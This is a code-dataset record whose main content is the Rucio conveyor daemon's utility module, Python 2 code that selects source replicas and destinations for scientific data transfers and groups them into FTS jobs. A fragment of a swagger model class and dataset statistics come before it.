self._test = test
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(PrivateTrial, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, PrivateTrial):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 35.920525 | 993 | 0.649595 | 6,187 | 51,977 | 5.290124 | 0.065621 | 0.058662 | 0.105591 | 0.096792 | 0.679377 | 0.572563 | 0.532478 | 0.444913 | 0.355545 | 0.277146 | 0 | 0.021011 | 0.273871 | 51,977 | 1,446 | 994 | 35.945367 | 0.846193 | 0.45751 | 0 | 0.090461 | 1 | 0 | 0.136703 | 0.008254 | 0 | 0 | 0 | 0 | 0 | 1 | 0.167763 | false | 0 | 0.004934 | 0 | 0.266447 | 0.003289 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
382f2f78668adbeb3d9c2f747861ad2dbe227500 | 78,600 | py | Python | lib/rucio/daemons/conveyor/utils.py | brianv0/rucio | 127a36fd53e5b4d9eb14ab02fe6c36443d78bfd0 | [
"Apache-2.0"
] | null | null | null | lib/rucio/daemons/conveyor/utils.py | brianv0/rucio | 127a36fd53e5b4d9eb14ab02fe6c36443d78bfd0 | [
"Apache-2.0"
] | null | null | null | lib/rucio/daemons/conveyor/utils.py | brianv0/rucio | 127a36fd53e5b4d9eb14ab02fe6c36443d78bfd0 | [
"Apache-2.0"
] | null | null | null | # Copyright European Organization for Nuclear Research (CERN)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Authors:
# - Vincent Garonne, <vincent.garonne@cern.ch>, 2012-2014
# - Mario Lassnig, <mario.lassnig@cern.ch>, 2013-2015
# - Cedric Serfon, <cedric.serfon@cern.ch>, 2013-2016
# - Wen Guan, <wen.guan@cern.ch>, 2014-2016
# - Joaquin Bogado, <jbogadog@cern.ch>, 2016
"""
Methods common to different conveyor submitter daemons.
"""
import math
import datetime
import json
import logging
import random
import time
import traceback
from dogpile.cache import make_region
from dogpile.cache.api import NoValue
from rucio.common.closeness_sorter import sort_sources
from rucio.common.exception import DataIdentifierNotFound, RSEProtocolNotSupported, InvalidRSEExpression, InvalidRequest
from rucio.common.rse_attributes import get_rse_attributes
from rucio.common.utils import construct_surl, chunks
from rucio.core import did, replica, request, rse as rse_core
from rucio.core.monitor import record_counter, record_timer, record_gauge
from rucio.core.rse_expression_parser import parse_expression
from rucio.db.sqla.constants import DIDType, RequestType, RequestState, RSEType
from rucio.db.sqla.session import read_session
from rucio.rse import rsemanager as rsemgr
REGION_SHORT = make_region().configure('dogpile.cache.memcached',
expiration_time=600,
arguments={'url': "127.0.0.1:11211", 'distributed_lock': True})
def get_rses(rses=None, include_rses=None, exclude_rses=None):
working_rses = []
rses_list = rse_core.list_rses()
if rses:
working_rses = [rse for rse in rses_list if rse['rse'] in rses]
if include_rses:
try:
parsed_rses = parse_expression(include_rses, session=None)
except InvalidRSEExpression, e:
logging.error("Invalid RSE exception %s to include RSEs" % (include_rses))
else:
for rse in parsed_rses:
if rse not in working_rses:
working_rses.append(rse)
if not (rses or include_rses):
working_rses = rses_list
if exclude_rses:
try:
parsed_rses = parse_expression(exclude_rses, session=None)
except InvalidRSEExpression, e:
logging.error("Invalid RSE exception %s to exclude RSEs: %s" % (exclude_rses, e))
else:
working_rses = [rse for rse in working_rses if rse not in parsed_rses]
working_rses = [rsemgr.get_rse_info(rse['rse']) for rse in working_rses]
return working_rses
def get_requests(rse_id=None,
process=0, total_processes=1, thread=0, total_threads=1,
mock=False, bulk=100, activity=None, activity_shares=None):
ts = time.time()
reqs = request.get_next(request_type=[RequestType.TRANSFER,
RequestType.STAGEIN,
RequestType.STAGEOUT],
state=RequestState.QUEUED,
limit=bulk,
rse=rse_id,
activity=activity,
process=process,
total_processes=total_processes,
thread=thread,
total_threads=total_threads,
activity_shares=activity_shares)
record_timer('daemons.conveyor.submitter.get_next', (time.time() - ts) * 1000)
return reqs
def get_sources(dest_rse, schemes, req, max_sources=4):
allowed_rses = []
if req['request_type'] == RequestType.STAGEIN:
rses = rse_core.list_rses(filters={'staging_buffer': dest_rse['rse']})
allowed_rses = [x['rse'] for x in rses]
allowed_source_rses = []
if req['attributes']:
if type(req['attributes']) is dict:
req_attributes = json.loads(json.dumps(req['attributes']))
else:
req_attributes = json.loads(str(req['attributes']))
source_replica_expression = req_attributes["source_replica_expression"]
if source_replica_expression:
try:
parsed_rses = parse_expression(source_replica_expression, session=None)
except InvalidRSEExpression, e:
logging.error("Invalid RSE exception %s for request %s: %s" % (source_replica_expression,
req['request_id'],
e))
allowed_source_rses = []
else:
allowed_source_rses = [x['rse'] for x in parsed_rses]
tmpsrc = []
metadata = {}
try:
ts = time.time()
replications = replica.list_replicas(dids=[{'scope': req['scope'],
'name': req['name'],
'type': DIDType.FILE}],
schemes=schemes)
record_timer('daemons.conveyor.submitter.list_replicas', (time.time() - ts) * 1000)
# return gracefully if there are no replicas for a DID
if not replications:
return None, None
for source in replications:
try:
metadata['filesize'] = long(source['bytes'])
except KeyError, e:
logging.error('source for %s:%s has no filesize set - skipping' % (source['scope'], source['name']))
continue
metadata['md5'] = source['md5']
metadata['adler32'] = source['adler32']
# TODO: Source protection
# we need to know upfront if we are mixed DISK/TAPE source
mixed_source = []
for source_rse in source['rses']:
mixed_source.append(rse_core.get_rse(source_rse).rse_type)
mixed_source = True if len(set(mixed_source)) > 1 else False
for source_rse in source['rses']:
if req['request_type'] == RequestType.STAGEIN:
if source_rse in allowed_rses:
for pfn in source['rses'][source_rse]:
# In case of staging request, we only use one source
tmpsrc = [(str(source_rse), str(pfn)), ]
elif req['request_type'] == RequestType.TRANSFER:
if source_rse == dest_rse['rse']:
logging.debug('Skip source %s for request %s because it is the destination' % (source_rse,
req['request_id']))
continue
if allowed_source_rses and not (source_rse in allowed_source_rses):
logging.debug('Skip source %s for request %s because of source_replica_expression %s' % (source_rse,
req['request_id'],
req['attributes']))
continue
# do not allow mixed source jobs, either all DISK or all TAPE
# do not use TAPE on the first try
if mixed_source:
if not req['previous_attempt_id'] and rse_core.get_rse(source_rse).rse_type == RSEType.TAPE and source_rse not in allowed_source_rses:
logging.debug('Skip tape source %s for request %s' % (source_rse,
req['request_id']))
continue
elif req['previous_attempt_id'] and rse_core.get_rse(source_rse).rse_type == RSEType.DISK and source_rse not in allowed_source_rses:
logging.debug('Skip disk source %s for retrial request %s' % (source_rse,
req['request_id']))
continue
filtered_sources = [x for x in source['rses'][source_rse] if x.startswith('gsiftp')]
if not filtered_sources:
filtered_sources = source['rses'][source_rse]
for pfn in filtered_sources:
tmpsrc.append((str(source_rse), str(pfn)))
except DataIdentifierNotFound:
record_counter('daemons.conveyor.submitter.lost_did')
logging.warn('DID %s:%s does not exist anymore - marking request %s as LOST' % (req['scope'],
req['name'],
req['request_id']))
return None, None
except:
record_counter('daemons.conveyor.submitter.unexpected')
logging.critical('Something unexpected happened: %s' % traceback.format_exc())
return None, None
sources = []
if tmpsrc == []:
record_counter('daemons.conveyor.submitter.nosource')
logging.warn('No source replicas found for DID %s:%s - deep check for unavailable replicas' % (req['scope'],
req['name']))
if sum(1 for tmp in replica.list_replicas([{'scope': req['scope'],
'name': req['name'],
'type': DIDType.FILE}],
schemes=schemes,
unavailable=True)):
logging.error('DID %s:%s lost! This should not happen!' % (req['scope'], req['name']))
return None, None
else:
used_sources = request.get_sources(req['request_id'])
for tmp in tmpsrc:
source_rse_info = rsemgr.get_rse_info(tmp[0])
rank = None
if used_sources:
for used_source in used_sources:
if used_source['rse_id'] == source_rse_info['id']:
# file already used
rank = used_source['ranking']
break
sources.append((tmp[0], tmp[1], source_rse_info['id'], rank))
if len(sources) > 1:
sources = sort_sources(sources, dest_rse['rse'])
if len(sources) > max_sources:
sources = sources[:max_sources]
random.shuffle(sources)
return sources, metadata
def get_destinations(rse_info, scheme, req, naming_convention):
dsn = 'other'
pfn = {}
if not rse_info['deterministic']:
ts = time.time()
# get rule scope and name
if req['attributes']:
if type(req['attributes']) is dict:
req_attributes = json.loads(json.dumps(req['attributes']))
else:
req_attributes = json.loads(str(req['attributes']))
if 'ds_name' in req_attributes:
dsn = req_attributes["ds_name"]
if dsn == 'other':
# select a containing dataset
for parent in did.list_parent_dids(req['scope'], req['name']):
if parent['type'] == DIDType.DATASET:
dsn = parent['name']
break
record_timer('daemons.conveyor.submitter.list_parent_dids', (time.time() - ts) * 1000)
# DQ2 path always starts with /, but prefix might not end with /
path = construct_surl(dsn, req['name'], naming_convention)
# retrial transfers to tape need a new filename - add timestamp
if req['request_type'] == RequestType.TRANSFER and rse_info['rse_type'] == 'TAPE':
if 'previous_attempt_id' in req and req['previous_attempt_id']:
path = '%s_%i' % (path, int(time.time()))
logging.debug('Retrial transfer request %s DID %s:%s to tape %s renamed to %s' % (req['request_id'],
req['scope'],
req['name'],
rse_info['rse'],
path))
elif req['activity'] and req['activity'] == 'Recovery':
path = '%s_%i' % (path, int(time.time()))
logging.debug('Recovery transfer request %s DID %s:%s to tape %s renamed to %s' % (req['request_id'],
req['scope'],
req['name'],
rse_info['rse'],
path))
# we must set the destination path for nondeterministic replicas explicitly
replica.update_replicas_paths([{'scope': req['scope'],
'name': req['name'],
'rse_id': req['dest_rse_id'],
'path': path}])
lfn = [{'scope': req['scope'], 'name': req['name'], 'path': path}]
else:
lfn = [{'scope': req['scope'], 'name': req['name']}]
ts = time.time()
try:
pfn = rsemgr.lfns2pfns(rse_info, lfns=lfn, operation='write', scheme=scheme)
except RSEProtocolNotSupported:
logging.error('Operation "write" not supported by %s' % (rse_info['rse']))
return None, None
record_timer('daemons.conveyor.submitter.lfns2pfns', (time.time() - ts) * 1000)
destinations = []
for k in pfn:
if isinstance(pfn[k], (str, unicode)):
destinations.append(pfn[k])
elif isinstance(pfn[k], (tuple, list)):
for url in pfn[k]:
destinations.append(pfn[k][url])
protocol = None
try:
protocol = rsemgr.select_protocol(rse_info, 'write', scheme=scheme)
except RSEProtocolNotSupported:
logging.error('Operation "write" not supported by %s' % (rse_info['rse']))
return None, None
# we need to set the spacetoken if we use SRM
dest_spacetoken = None
if protocol['extended_attributes'] and 'space_token' in protocol['extended_attributes']:
dest_spacetoken = protocol['extended_attributes']['space_token']
return destinations, dest_spacetoken
def get_transfer(rse, req, scheme, mock, max_sources=4):
src_spacetoken = None
if req['request_type'] == RequestType.STAGEIN:
# for staging in, get the sources at first, then use the sources as destination
if not (rse['staging_area'] or rse['rse'].endswith("STAGING")):
raise InvalidRequest('Not a STAGING RSE for STAGE-IN request')
ts = time.time()
if scheme is None:
sources, metadata = get_sources(rse, None, req, max_sources=max_sources)
else:
if not isinstance(scheme, list):
scheme = scheme.split(',')
sources, metadata = get_sources(rse, scheme, req, max_sources=max_sources)
record_timer('daemons.conveyor.submitter.get_sources', (time.time() - ts) * 1000)
logging.debug('Sources for request %s: %s' % (req['request_id'], sources))
if sources is None:
logging.error("Request %s DID %s:%s RSE %s failed to get sources" % (req['request_id'],
req['scope'],
req['name'],
rse['rse']))
return None
filesize = metadata['filesize']
md5 = metadata['md5']
adler32 = metadata['adler32']
# Sources are properly set, so now we can finally force the source RSE to the destination RSE for STAGEIN
dest_rse = sources[0][0]
rse_attr = rse_core.list_rse_attributes(sources[0][0])
fts_hosts = rse_attr.get('fts', None)
naming_convention = rse_attr.get('naming_convention', None)
if len(sources) == 1:
destinations = [sources[0][1]]
else:
# TODO: need to check
return None
protocol = None
try:
# for stagin, dest_space_token should be the source space token
source_rse_info = rsemgr.get_rse_info(sources[0][0])
protocol = rsemgr.select_protocol(source_rse_info, 'write')
except RSEProtocolNotSupported:
logging.error('Operation "write" not supported by %s' % (source_rse_info['rse']))
return None
# we need to set the spacetoken if we use SRM
dest_spacetoken = None
if 'space_token' in protocol['extended_attributes']:
dest_spacetoken = protocol['extended_attributes']['space_token']
# Extend the metadata dictionary with request attributes
copy_pin_lifetime, overwrite, bring_online = -1, True, None
if req['attributes']:
if type(req['attributes']) is dict:
attr = json.loads(json.dumps(req['attributes']))
else:
attr = json.loads(str(req['attributes']))
copy_pin_lifetime = attr.get('lifetime')
overwrite = False
bring_online = 172800
else:
# for normal transfer, get the destination at first, then use the destination scheme to get sources
rse_attr = rse_core.list_rse_attributes(rse['rse'], rse['id'])
fts_hosts = rse_attr.get('fts', None)
naming_convention = rse_attr.get('naming_convention', None)
ts = time.time()
destinations, dest_spacetoken = get_destinations(rse, scheme, req, naming_convention)
record_timer('daemons.conveyor.submitter.get_destinations', (time.time() - ts) * 1000)
logging.debug('Destinations for request %s: %s' % (req['request_id'], destinations))
if destinations is None:
logging.error("Request %s DID %s:%s RSE %s failed to get destinations" % (req['request_id'],
req['scope'],
req['name'],
rse['rse']))
return None
schemes = []
for destination in destinations:
schemes.append(destination.split("://")[0])
if 'srm' in schemes and 'gsiftp' not in schemes:
schemes.append('gsiftp')
if 'gsiftp' in schemes and 'srm' not in schemes:
schemes.append('srm')
logging.debug('Schemes will be allowed for sources: %s' % (schemes))
ts = time.time()
sources, metadata = get_sources(rse, schemes, req, max_sources=max_sources)
record_timer('daemons.conveyor.submitter.get_sources', (time.time() - ts) * 1000)
logging.debug('Sources for request %s: %s' % (req['request_id'], sources))
if not sources:
logging.error("Request %s DID %s:%s RSE %s failed to get sources" % (req['request_id'],
req['scope'],
req['name'],
rse['rse']))
return None
dest_rse = rse['rse']
# exclude destination replica from source
new_sources = sources
for source in sources:
if source[0] == dest_rse:
logging.info('Excluding source %s for request %s: source is destination' % (source[0],
req['request_id']))
new_sources.remove(source)
sources = new_sources
filesize = metadata['filesize']
md5 = metadata['md5']
adler32 = metadata['adler32']
# Extend the metadata dictionary with request attributes
copy_pin_lifetime, overwrite, bring_online = -1, True, None
if rse_core.get_rse(sources[0][0]).rse_type == RSEType.TAPE:
bring_online = 172800
if rse_core.get_rse(None, rse_id=req['dest_rse_id']).rse_type == RSEType.TAPE:
overwrite = False
# make sure we only use one source when bring_online is needed
if bring_online and len(sources) > 1:
sources = [sources[0]]
logging.info('Only using first source %s for bring_online request %s' % (sources,
req['request_id']))
# Come up with mock sources if necessary
if mock:
tmp_sources = []
for s in sources:
tmp_sources.append((s[0], ':'.join(['mock'] + s[1].split(':')[1:]), s[2], s[3]))
sources = tmp_sources
source_surls = [s[1] for s in sources]
if not source_surls:
logging.error('All sources excluded - SKIP REQUEST %s' % req['request_id'])
return
tmp_metadata = {'request_id': req['request_id'],
'scope': req['scope'],
'name': req['name'],
'activity': req['activity'],
'src_rse': sources[0][0],
'dst_rse': dest_rse,
'dest_rse_id': req['dest_rse_id'],
'filesize': filesize,
'md5': md5,
'adler32': adler32}
if 'previous_attempt_id' in req and req['previous_attempt_id']:
tmp_metadata['previous_attempt_id'] = req['previous_attempt_id']
retry_count = req['retry_count']
if not retry_count:
retry_count = 0
if not fts_hosts:
logging.error('Destination RSE %s FTS attribute not defined - SKIP REQUEST %s' % (rse['rse'], req['request_id']))
return
fts_list = fts_hosts.split(",")
external_host = fts_list[retry_count % len(fts_list)]
transfer = {'request_id': req['request_id'],
'sources': sources,
# 'src_urls': source_surls,
'dest_urls': destinations,
'filesize': filesize,
'md5': md5,
'adler32': adler32,
'src_spacetoken': src_spacetoken,
'dest_spacetoken': dest_spacetoken,
'activity': req['activity'],
'overwrite': overwrite,
'bring_online': bring_online,
'copy_pin_lifetime': copy_pin_lifetime,
'external_host': external_host,
'file_metadata': tmp_metadata,
'rule_id': req['rule_id']}
return transfer
def get_transfers_from_requests(process=0, total_processes=1, thread=0, total_threads=1, rse_ids=None,
mock=False, bulk=100, activity=None, activity_shares=None, scheme=None, max_sources=4):
ts = time.time()
reqs = get_requests(process=process,
total_processes=total_processes,
thread=thread,
total_threads=total_threads,
mock=mock,
bulk=bulk,
activity=activity,
activity_shares=activity_shares)
record_timer('daemons.conveyor.submitter.get_requests', (time.time() - ts) * 1000)
if reqs:
logging.debug('%i:%i - Getting %i requests' % (process, thread, len(reqs)))
if not reqs or reqs == []:
return {}
# get transfers
transfers = {}
for req in reqs:
try:
if rse_ids and req['dest_rse_id'] not in rse_ids:
# logging.info("Request dest %s is not in RSEs list, skip")
continue
else:
dest_rse = rse_core.get_rse(rse=None, rse_id=req['dest_rse_id'])
rse_info = rsemgr.get_rse_info(dest_rse['rse'])
ts = time.time()
transfer = get_transfer(rse_info, req, scheme, mock, max_sources=max_sources)
record_timer('daemons.conveyor.submitter.get_transfer', (time.time() - ts) * 1000)
logging.debug('Transfer for request %s: %s' % (req['request_id'], transfer))
if transfer is None:
logging.error("Request %s DID %s:%s RSE %s failed to get transfer" % (req['request_id'],
req['scope'],
req['name'],
rse_info['rse']))
request.set_request_state(req['request_id'], RequestState.LOST)
continue
transfers[req['request_id']] = transfer
except Exception, e:
logging.error("Failed to get transfer for request(%s): %s " % (req['request_id'], str(e)))
return transfers
def bulk_group_transfer(transfers, policy='rule', group_bulk=200, fts_source_strategy='auto', max_time_in_queue=None):
grouped_transfers = {}
grouped_jobs = {}
for request_id in transfers:
transfer = transfers[request_id]
external_host = transfer['external_host']
if external_host not in grouped_transfers:
grouped_transfers[external_host] = {}
grouped_jobs[external_host] = []
file = {'sources': transfer['sources'],
'destinations': transfer['dest_urls'],
'metadata': transfer['file_metadata'],
'filesize': int(transfer['file_metadata']['filesize']),
'checksum': None,
'selection_strategy': fts_source_strategy,
'request_type': transfer['file_metadata'].get('request_type', None),
'activity': str(transfer['file_metadata']['activity'])}
if file['metadata'].get('verify_checksum', True):
if 'md5' in file['metadata'].keys() and file['metadata']['md5']:
file['checksum'] = 'MD5:%s' % str(file['metadata']['md5'])
if 'adler32' in file['metadata'].keys() and file['metadata']['adler32']:
file['checksum'] = 'ADLER32:%s' % str(file['metadata']['adler32'])
job_params = {'verify_checksum': True if file['checksum'] and file['metadata'].get('verify_checksum', True) else False,
'spacetoken': transfer['dest_spacetoken'] if transfer['dest_spacetoken'] else 'null',
'copy_pin_lifetime': transfer['copy_pin_lifetime'] if transfer['copy_pin_lifetime'] else -1,
'bring_online': transfer['bring_online'] if transfer['bring_online'] else None,
'job_metadata': {'issuer': 'rucio'}, # finaly job_meta will like this. currently job_meta will equal file_meta to include request_id and etc.
'source_spacetoken': transfer['src_spacetoken'] if transfer['src_spacetoken'] else None,
'overwrite': transfer['overwrite'],
'priority': 3}
if max_time_in_queue:
if transfer['file_metadata']['activity'] in max_time_in_queue:
job_params['max_time_in_queue'] = max_time_in_queue[transfer['file_metadata']['activity']]
elif 'default' in max_time_in_queue:
job_params['max_time_in_queue'] = max_time_in_queue['default']
# for multiple source replicas, no bulk submission
if len(transfer['sources']) > 1:
job_params['job_metadata']['multi_sources'] = True
grouped_jobs[external_host].append({'files': [file], 'job_params': job_params})
else:
job_params['job_metadata']['multi_sources'] = False
job_key = '%s,%s,%s,%s,%s,%s,%s,%s' % (job_params['verify_checksum'], job_params['spacetoken'], job_params['copy_pin_lifetime'],
job_params['bring_online'], job_params['job_metadata'], job_params['source_spacetoken'],
job_params['overwrite'], job_params['priority'])
if 'max_time_in_queue' in job_params:
job_key = job_key + ',%s' % job_params['max_time_in_queue']
if job_key not in grouped_transfers[external_host]:
grouped_transfers[external_host][job_key] = {}
if policy == 'rule':
policy_key = '%s' % (transfer['rule_id'])
if policy == 'dest':
policy_key = '%s' % (file['metadata']['dst_rse'])
if policy == 'src_dest':
policy_key = '%s,%s' % (file['metadata']['src_rse'], file['metadata']['dst_rse'])
if policy == 'rule_src_dest':
policy_key = '%s,%s,%s' % (transfer['rule_id'], file['metadata']['src_rse'], file['metadata']['dst_rse'])
# maybe here we need to hash the key if it's too long
if policy_key not in grouped_transfers[external_host][job_key]:
grouped_transfers[external_host][job_key][policy_key] = {'files': [file], 'job_params': job_params}
else:
grouped_transfers[external_host][job_key][policy_key]['files'].append(file)
# for jobs with different job_key, we cannot put in one job.
for external_host in grouped_transfers:
for job_key in grouped_transfers[external_host]:
# for all policy groups in job_key, the job_params is the same.
for policy_key in grouped_transfers[external_host][job_key]:
job_params = grouped_transfers[external_host][job_key][policy_key]['job_params']
for xfers_files in chunks(grouped_transfers[external_host][job_key][policy_key]['files'], group_bulk):
# for the last small piece, just submit it.
grouped_jobs[external_host].append({'files': xfers_files, 'job_params': job_params})
return grouped_jobs
@read_session
def get_unavailable_read_rse_ids(session=None):
key = 'unavailable_read_rse_ids'
result = REGION_SHORT.get(key)
if type(result) is NoValue:
try:
logging.debug("Refresh unavailable read rses")
unavailable_read_rses = rse_core.list_rses(filters={'availability_read': False}, session=session)
unavailable_read_rse_ids = [r['id'] for r in unavailable_read_rses]
REGION_SHORT.set(key, unavailable_read_rse_ids)
return unavailable_read_rse_ids
except:
logging.warning("Failed to refresh unavailable read rses, error: %s" % (traceback.format_exc()))
return []
return result
@read_session
def get_transfer_requests_and_source_replicas(process=None, total_processes=None, thread=None, total_threads=None,
limit=None, activity=None, older_than=None, rses=None, schemes=None,
bring_online=43200, retry_other_fts=False, failover_schemes=None, session=None):
req_sources = request.list_transfer_requests_and_source_replicas(process=process, total_processes=total_processes, thread=thread, total_threads=total_threads,
limit=limit, activity=activity, older_than=older_than, rses=rses, session=session)
unavailable_read_rse_ids = get_unavailable_read_rse_ids(session=session)
bring_online_local = bring_online
transfers, rses_info, protocols, rse_attrs, reqs_no_source, reqs_only_tape_source, reqs_scheme_mismatch = {}, {}, {}, {}, [], [], []
for id, rule_id, scope, name, md5, adler32, bytes, activity, attributes, previous_attempt_id, dest_rse_id, source_rse_id, rse, deterministic, rse_type, path, retry_count, src_url, ranking, link_ranking in req_sources:
transfer_src_type = "DISK"
transfer_dst_type = "DISK"
allow_tape_source = True
try:
if rses and dest_rse_id not in rses:
continue
current_schemes = schemes
if previous_attempt_id and failover_schemes:
current_schemes = failover_schemes
if id not in transfers:
if id not in reqs_no_source:
reqs_no_source.append(id)
# source_rse_id will be None if no source replicas
# rse will be None if rse is staging area
if source_rse_id is None or rse is None:
continue
if link_ranking is None:
logging.debug("Request %s: no link from %s to %s" % (id, source_rse_id, dest_rse_id))
continue
if source_rse_id in unavailable_read_rse_ids:
continue
# Get destination rse information and protocol
if dest_rse_id not in rses_info:
dest_rse = rse_core.get_rse_name(rse_id=dest_rse_id, session=session)
rses_info[dest_rse_id] = rsemgr.get_rse_info(dest_rse, session=session)
if dest_rse_id not in rse_attrs:
rse_attrs[dest_rse_id] = get_rse_attributes(dest_rse_id, session=session)
attr = None
if attributes:
if type(attributes) is dict:
attr = json.loads(json.dumps(attributes))
else:
attr = json.loads(str(attributes))
# parse source expression
source_replica_expression = attr["source_replica_expression"] if (attr and "source_replica_expression" in attr) else None
if source_replica_expression:
try:
parsed_rses = parse_expression(source_replica_expression, session=session)
except InvalidRSEExpression, e:
logging.error("Invalid RSE exception %s: %s" % (source_replica_expression, e))
continue
else:
allowed_rses = [x['rse'] for x in parsed_rses]
if rse not in allowed_rses:
continue
# parse allow tape source expression, not finally version.
# allow_tape_source = attr["allow_tape_source"] if (attr and "allow_tape_source" in attr) else True
allow_tape_source = True
# Get protocol
if dest_rse_id not in protocols:
try:
protocols[dest_rse_id] = rsemgr.create_protocol(rses_info[dest_rse_id], 'write', current_schemes)
except RSEProtocolNotSupported:
logging.error('Operation "write" not supported by %s with schemes %s' % (rses_info[dest_rse_id]['rse'], current_schemes))
if id in reqs_no_source:
reqs_no_source.remove(id)
if id not in reqs_scheme_mismatch:
reqs_scheme_mismatch.append(id)
continue
# get dest space token
dest_spacetoken = None
if protocols[dest_rse_id].attributes and \
'extended_attributes' in protocols[dest_rse_id].attributes and \
protocols[dest_rse_id].attributes['extended_attributes'] and \
'space_token' in protocols[dest_rse_id].attributes['extended_attributes']:
dest_spacetoken = protocols[dest_rse_id].attributes['extended_attributes']['space_token']
# Compute the destination url
if rses_info[dest_rse_id]['deterministic']:
dest_url = protocols[dest_rse_id].lfns2pfns(lfns={'scope': scope, 'name': name}).values()[0]
else:
# compute dest url in case of non deterministic
# naming convention, etc.
dsn = 'other'
if attr and 'ds_name' in attr:
dsn = attr["ds_name"]
else:
# select a containing dataset
for parent in did.list_parent_dids(scope, name):
if parent['type'] == DIDType.DATASET:
dsn = parent['name']
break
# DQ2 path always starts with /, but prefix might not end with /
naming_convention = rse_attrs[dest_rse_id].get('naming_convention', None)
dest_path = construct_surl(dsn, name, naming_convention)
if rses_info[dest_rse_id]['rse_type'] == RSEType.TAPE or rses_info[dest_rse_id]['rse_type'] == 'TAPE':
if retry_count or activity == 'Recovery':
dest_path = '%s_%i' % (dest_path, int(time.time()))
dest_url = protocols[dest_rse_id].lfns2pfns(lfns={'scope': scope, 'name': name, 'path': dest_path}).values()[0]
# get allowed source scheme
src_schemes = []
dest_scheme = dest_url.split("://")[0]
if dest_scheme in ['srm', 'gsiftp']:
src_schemes = ['srm', 'gsiftp']
else:
src_schemes = [dest_scheme]
# Compute the sources: urls, etc
if source_rse_id not in rses_info:
# source_rse = rse_core.get_rse_name(rse_id=source_rse_id, session=session)
source_rse = rse
rses_info[source_rse_id] = rsemgr.get_rse_info(source_rse, session=session)
# Get protocol
source_rse_id_key = '%s_%s' % (source_rse_id, '_'.join(src_schemes))
if source_rse_id_key not in protocols:
try:
protocols[source_rse_id_key] = rsemgr.create_protocol(rses_info[source_rse_id], 'read', src_schemes)
except RSEProtocolNotSupported:
logging.error('Operation "read" not supported by %s with schemes %s' % (rses_info[source_rse_id]['rse'], src_schemes))
if id in reqs_no_source:
reqs_no_source.remove(id)
if id not in reqs_scheme_mismatch:
reqs_scheme_mismatch.append(id)
continue
source_url = protocols[source_rse_id_key].lfns2pfns(lfns={'scope': scope, 'name': name, 'path': path}).values()[0]
# Extend the metadata dictionary with request attributes
overwrite, bring_online = True, None
if rses_info[source_rse_id]['rse_type'] == RSEType.TAPE or rses_info[source_rse_id]['rse_type'] == 'TAPE':
bring_online = bring_online_local
transfer_src_type = "TAPE"
if not allow_tape_source:
if id not in reqs_only_tape_source:
reqs_only_tape_source.append(id)
if id in reqs_no_source:
reqs_no_source.remove(id)
continue
if rses_info[dest_rse_id]['rse_type'] == RSEType.TAPE or rses_info[dest_rse_id]['rse_type'] == 'TAPE':
overwrite = False
transfer_dst_type = "TAPE"
# get external_host
fts_hosts = rse_attrs[dest_rse_id].get('fts', None)
if not fts_hosts:
logging.error('Source RSE %s FTS attribute not defined - SKIP REQUEST %s' % (rse, id))
continue
if retry_count is None:
retry_count = 0
fts_list = fts_hosts.split(",")
external_host = fts_list[0]
if retry_other_fts:
external_host = fts_list[retry_count % len(fts_list)]
if id in reqs_no_source:
reqs_no_source.remove(id)
if id in reqs_only_tape_source:
reqs_only_tape_source.remove(id)
file_metadata = {'request_id': id,
'scope': scope,
'name': name,
'activity': activity,
'request_type': str(RequestType.TRANSFER).lower(),
'src_type': transfer_src_type,
'dst_type': transfer_dst_type,
'src_rse': rse,
'dst_rse': rses_info[dest_rse_id]['rse'],
'src_rse_id': source_rse_id,
'dest_rse_id': dest_rse_id,
'filesize': bytes,
'md5': md5,
'adler32': adler32,
'verify_checksum': rse_attrs[dest_rse_id].get('verify_checksum', True)}
if previous_attempt_id:
file_metadata['previous_attempt_id'] = previous_attempt_id
transfers[id] = {'request_id': id,
'schemes': src_schemes,
# 'src_urls': [source_url],
'sources': [(rse, source_url, source_rse_id, ranking if ranking is not None else 0, link_ranking)],
'dest_urls': [dest_url],
'src_spacetoken': None,
'dest_spacetoken': dest_spacetoken,
'overwrite': overwrite,
'bring_online': bring_online,
'copy_pin_lifetime': attr.get('lifetime', -1),
'external_host': external_host,
'selection_strategy': 'auto',
'rule_id': rule_id,
'file_metadata': file_metadata}
else:
schemes = transfers[id]['schemes']
# source_rse_id will be None if no source replicas
# rse will be None if rse is staging area
if source_rse_id is None or rse is None:
continue
if link_ranking is None:
logging.debug("Request %s: no link from %s to %s" % (id, source_rse_id, dest_rse_id))
continue
if source_rse_id in unavailable_read_rse_ids:
continue
attr = None
if attributes:
if type(attributes) is dict:
attr = json.loads(json.dumps(attributes))
else:
attr = json.loads(str(attributes))
# parse source expression
source_replica_expression = attr["source_replica_expression"] if (attr and "source_replica_expression" in attr) else None
if source_replica_expression:
try:
parsed_rses = parse_expression(source_replica_expression, session=session)
except InvalidRSEExpression, e:
logging.error("Invalid RSE exception %s: %s" % (source_replica_expression, e))
continue
else:
allowed_rses = [x['rse'] for x in parsed_rses]
if rse not in allowed_rses:
continue
# parse allow tape source expression, not finally version.
allow_tape_source = attr["allow_tape_source"] if (attr and "allow_tape_source" in attr) else True
# Compute the sources: urls, etc
if source_rse_id not in rses_info:
# source_rse = rse_core.get_rse_name(rse_id=source_rse_id, session=session)
source_rse = rse
rses_info[source_rse_id] = rsemgr.get_rse_info(source_rse, session=session)
if ranking is None:
ranking = 0
